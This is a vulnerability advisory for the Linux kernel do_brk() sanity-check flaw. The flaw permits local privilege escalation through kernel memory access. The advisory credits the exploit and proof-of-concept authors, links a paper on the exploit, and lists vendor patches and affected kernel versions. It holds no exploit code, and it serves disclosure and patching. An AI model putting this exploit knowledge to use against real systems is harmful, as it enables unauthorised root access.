A vulnerability has been discovered in the Linux kernel when handling user-supplied data passed to the do_brk() function. The problem is said to occur due to the do_brk() function failing to carry out sufficient sanity checking when handling address data supplied by a user. As a result, an attacker may be capable of gaining access to sensitive kernel memory. This could ultimately allow for the attacker to read and write to kernel memory, effectively allowing for elevation of local privileges.

- Exploit

A reliable exploit to provide for privilege escalation has been developed by Paul Starzetz <ihaquer@isec.pl> and Wojciech Purczynski <cliph@isec.pl>. This exploit is presented in the following document:
http://isec.pl/papers/linux_kernel_do_brk.pdf

Debian has stated that a program designed to exploit this issue was discovered and analyzed on a compromised system. This exploit is not publicly available; however, it can be assumed that this program is being used to actively exploit systems in the wild.

A proof of concept exploit designed to crash a system has been made available by Christophe Devine <DEVINE@iie.cnam.fr>. A second proof of concept making use of the sys_brk kernel call has been developed and supplied by Julien TINNES <julien@cr0.org>.

CORE has developed a working commercial exploit for their IMPACT product. This exploit is not otherwise publicly available or known to be circulating in the wild.

- Solution

Sun has released a fix to address this issue in the Sun Cobalt RaQ 550. The fix is linked below.

Debian has released an advisory (DSA 423-1) that addresses the issue that is described in this BID for the IA-64 architecture. Further details regarding obtaining and applying fixes can be found in the referenced advisory.

RedHat has released security advisories RHSA-2003-389 and RHSA-2003:392-00 to address this issue. Additional information about associated fixes can be found in the appropriate advisory reference.

RedHat has also released advisory RHSA-2003:368-11 for affected versions of Enterprise Linux and Advanced Workstation Linux. Affected users are advised to run up2date to resolve this issue.

Debian has released a security advisory DSA-403-1 which contains a number of fixes to address this issue. Users are advised to see the referenced advisory for further details on how to obtain and apply fixes.

Mandrake has released a security advisory (MDKSA-2003:110) including fixes to address this issue. Information on how to obtain and apply fixes can be found in the referenced advisory.

Trustix has released a security advisory (TSLSA-2003-0046) including fixes to address this issue. Fixes are available below.

This issue has also been addressed in the Linux 2.4.23 and 2.6.0-test6 releases. Users are advised to upgrade as soon as possible.

Astaro has released fixes Astaro Security Linux 4.017 (new V4 ISO) and Up2date 4.017 to address this issue. Please see the referenced web sites for more information.

Slackware Linux has released an advisory SSA:2003-336-01 including fixes to address this issue.

SGI has released an advisory (20031201-01-A) to address this issue. SGI has reported that SGI ProPack version 2.3 is not vulnerable to this issue; customers who have not received ProPack version 2.3 CDs are advised to contact their SGI Support Provider. Please see the referenced advisory for further details.

TurboLinux has released a security announcement including fixes to address this issue.

Yellow Dog Linux has released advisory YDU-20031203-1 to address this issue.

Advisory SuSE-SA:2003:049 has been released by SuSE to resolve this issue.

Gentoo has released advisory 200312-02 to address this issue. Affected users are advised to perform the following actions:

emerge sync
emerge -pv [your preferred kernel sources]
emerge [your preferred kernel sources]
[update the /usr/src/linux symlink]
[compile and install your new kernel]
[emerge any necessary kernel module ebuilds]
[reboot]

Conectiva has released a security advisory CLA-2003:796 including fixes to address this issue.

SmoothWall has released fixes to address this issue in SmoothWall Express 2.0. Users are advised to obtain the fixes through the SmoothWall interface. Please see the referenced web page for more information. Users may download the fixes1 patch by carrying out the following steps:

Go to Maintenance -> Updates on your SmoothWall web interface, and upload the file called fixes1.

SGI has released a security advisory 20040102-01-U including fixes to address this issue. Please see the attached advisory for more information.

Debian has released advisory DSA-433-1 to address this issue for the mips and mipsel architectures.

VMWare has released a fix to address this issue in VMWare ESX Server 2.0.1 build 6403. Please see the referenced web page for more information.

Debian has released two advisories DSA-439-1 and DSA-440-1 to address this and other issues. Please see the referenced advisories for more information.

Debian has released DSA 442-1 to provide fixes for s390 platforms. Please see the attached advisory for further information.

Debian has released DSA 450-1 to provide MIPS kernel fixes. Please see the attached advisory for further details.

Debian has released DSA 470-1 to address this and other issues in the HP Precision architecture. Please see the referenced advisory for more information.

A VMWare advisory and fixes are available for their ESX Server package. Please see the reference section for more information.

Debian has released advisory DSA 475-1 with fixes dealing with this and other issues for the HP Precision architecture.

Fixes:

Sun Cobalt RaQ 550
Trustix Secure Linux 2.0
VMWare ESX Server 2.0
VMWare ESX Server 2.0.1 build 6403
VMWare ESX Server 2.0.1
Linux kernel 2.4
Linux kernel 2.4.1
Linux kernel 2.4.11
Linux kernel 2.4.12
Linux kernel 2.4.13
Linux kernel 2.4.14
Linux kernel 2.4.15
Linux kernel 2.4.17
Linux kernel 2.4.18
Linux kernel 2.4.19
Linux kernel 2.4.21
Linux kernel 2.4.22

About the SCAP Chinese Community

The SCAP Chinese Community is the first Chinese-language open community in China devoted to SCAP. For more information, see [About this site].

Copyright notice

CVE/CWE/OVAL are registered trademarks of the MITRE Corporation; their official data sources are maintained on MITRE's websites.